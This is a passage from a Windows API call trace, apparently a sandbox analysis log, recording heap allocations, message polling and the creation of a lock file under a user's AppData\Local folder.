Size=0x10) returned 0x2aaae28 [0198.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0198.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0198.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0198.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0198.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0198.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0198.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0198.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacf0 [0198.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0198.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0198.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0198.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0198.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0198.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0198.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0198.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0198.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0198.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0198.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0198.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0198.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0198.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0198.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0198.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0198.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0198.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75380 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69700 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0198.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0198.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0198.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0198.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0198.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0198.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0198.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0198.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0198.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0198.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0198.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0198.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0198.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0198.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0198.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0198.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0198.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0198.856] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0198.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0198.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0198.856] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0198.856] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0198.856] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0198.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0198.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0198.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0198.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0198.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0198.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0198.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0198.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0198.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0198.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0198.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0198.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0198.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0198.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0198.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0198.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0198.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0198.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0198.858] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/PeerDistRepub" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\peerdistrepub"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0198.858] GetLastError () returned 0x5 [0198.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0198.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0198.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0198.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0198.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0198.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0198.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0198.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0198.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0198.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0198.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0198.858] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0198.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0198.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0198.859] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0198.859] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0198.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0198.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0198.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0198.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0198.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0198.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0198.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0198.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0198.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0198.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0198.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0198.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0198.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0198.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0198.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0198.859] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0198.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0198.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0198.860] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.PeerDistRepub" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.peerdistrepub"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0198.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0198.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0198.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0198.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0198.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0198.861] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.861] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0198.861] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.861] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0198.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0198.862] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0198.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0198.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0198.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0198.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0198.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0198.862] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0198.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0198.862] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.862] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0198.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0198.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0198.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0198.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0198.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0198.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0198.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0198.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0198.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0198.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0198.863] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0198.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: 